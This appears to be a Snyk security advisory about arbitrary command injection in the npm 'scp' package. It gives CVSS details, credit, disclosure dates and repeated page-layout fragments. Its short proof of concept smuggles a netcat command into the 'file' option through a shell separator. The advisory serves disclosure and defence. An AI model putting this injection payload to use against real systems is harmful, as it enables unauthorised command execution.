Arbitrary Command Injection in scp

Do your applications use this vulnerable package? Test your applications

Overview

Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user input is formatted inside a command that will be executed without any checks.

PoC By Snyk Security Team

var scp = require('scp');

var options = {
    file: '& nc localhost 4444; #',
    user: 'username',
    host: 'myServer',
    port: '20',
    path: '~'
}

scp.send(options, function (err) {
    if (err) console.log(err);
    else console.log('File transferred.');
});

Remediation

There is no fixed version for scp.

Attack Vector

Network
Attack Complexity

Low
Privileges Required

None
User Interaction

Required
Scope

Unchanged
Confidentiality

High
Integrity

High
Availability

Low

Credit: Mik317
CWE: CWE-78
Snyk ID: SNYK-JS-SCP-1009828
Disclosed: 07 May, 2020
Published: 21 Jun, 2020

Arbitrary Command Injection
Affecting scp package, ALL versions

Overview

PoC By Snyk Security Team

Remediation

CVSS Score

Arbitrary Command Injection Affecting scp package, ALL versions

Overview

PoC By Snyk Security Team

Remediation

Arbitrary Command Injection
Affecting scp package, ALL versions